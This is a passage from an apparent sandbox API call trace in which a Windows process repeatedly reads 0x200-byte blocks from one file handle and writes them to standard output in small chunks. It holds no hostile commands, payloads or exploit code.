lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.960] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] GetFileType (hFile=0x50) returned 0x1 [0177.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.960] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 
0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.961] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] GetFileType (hFile=0x50) returned 0x1 [0177.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.961] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) 
returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.962] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] GetFileType (hFile=0x50) returned 0x1 [0177.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.962] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.963] ReadFile 
(in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] GetFileType (hFile=0x50) returned 0x1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.963] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.964] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.964] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, 
lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, 
lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.965] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.965] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, 
lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecfc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed4c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] GetFileType (hFile=0x50) returned 0x1 [0177.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.966] WriteFile (in: hFile=0x50, lpBuffer=0x14ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ed9c*, lpNumberOfBytesWritten=0x14dda0*=0x20, lpOverlapped=0x0) returned 1 [0177.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0177.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14dd8c | out: lpNewFilePointer=0x0) returned 1 [0177.966] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0177.966] ReadFile (in: hFile=0x58, lpBuffer=0x14ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14ddac, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesRead=0x14ddac*=0x200, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ebbc*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec0c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ec5c*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] GetFileType (hFile=0x50) returned 0x1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] WriteFile (in: hFile=0x50, lpBuffer=0x14ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14dda0, lpOverlapped=0x0 | out: lpBuffer=0x14ecac*, lpNumberOfBytesWritten=0x14dda0*=0x50, lpOverlapped=0x0) returned 1 [0177.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0177.967] 
